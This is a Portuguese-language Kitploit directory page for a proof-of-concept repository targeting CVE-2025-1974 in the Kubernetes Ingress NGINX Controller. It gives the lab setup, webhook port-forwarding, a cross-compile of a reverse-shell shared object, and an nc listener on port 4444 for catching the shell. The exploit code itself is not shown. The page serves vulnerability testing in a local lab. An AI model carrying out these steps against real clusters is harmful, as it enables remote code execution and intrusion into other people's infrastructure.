Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-1974 — Código PoC do CVE-2025-1974 | Kitploit
Ferramentas/GitHubGitHub/zulloper/cve-2025-1974
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoSegurança na Nuvem
GitHubzulloper/cve-2025-1974

CVE-2025-1974

Código PoC do CVE-2025-1974

Ver Repositório
5há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-1974: Análise da Vulnerabilidade do Kubernetes Ingress Nginx Controller e Configuração do Ambiente PoC

Ambiente de Teste

  • MacOS (M2)
  • Ingress NGINX Controller 1.11.3
  • Rancher Desktop (Docker)
  • Minikube (Kubernetes)

Configuração do Ambiente de Teste Local (M2 MacOS)

Instale o minikube para teste local

minikube start --driver=docker

Configure o ingress-nginx-controller com o comando abaixo

kubectl apply -f ingress-nginx-controller.yml

Encaminhamento de Porta

Verifique se os Pods estão funcionando corretamente

kubectl get pods -n ingress-nginx

kubectl describe <pod name> -n ingress-nginx

Encaminhe as portas 80 e 8443 (webhook) dos Pods para as portas locais 8888 e 1337 (ambos os encaminhamentos de porta 80 e 8443 são necessários)

kubectl port-forward -n ingress-nginx <pod name> 8888:80

kubectl port-forward -n ingress-nginx <pod name> 1337:8443

Preparação da biblioteca de objetos compartilhados (so)

Altere o IP e a Porta da conexão do reverse shell em rev_shell.c

Compile no ambiente MacOS (arm64) e ajuste para o ambiente de teste

aarch64-linux-gnu-gcc -shared -fPIC -o rev_shell.so rev_shell.c

root@kitploit:~
# Instalar compilador cruzado
brew tap messense/macos-cross-toolchains
brew install aarch64-linux-gnu

Criação de AdmissionReview (opcional, pode usar o arquivo existente)

Converta para o formato AdmissionReview com kube-review (json)

./kube-review-darwin-arm64 create admission_test.yml > admission_review_req_body.json

Exploit

Prepare a conexão do reverse shell com nc

nc -lv 4444

Modifique o host e a porta do nginx e webhook no exploit.py e execute

python3 exploit.py

img.png

Baixar ferramenta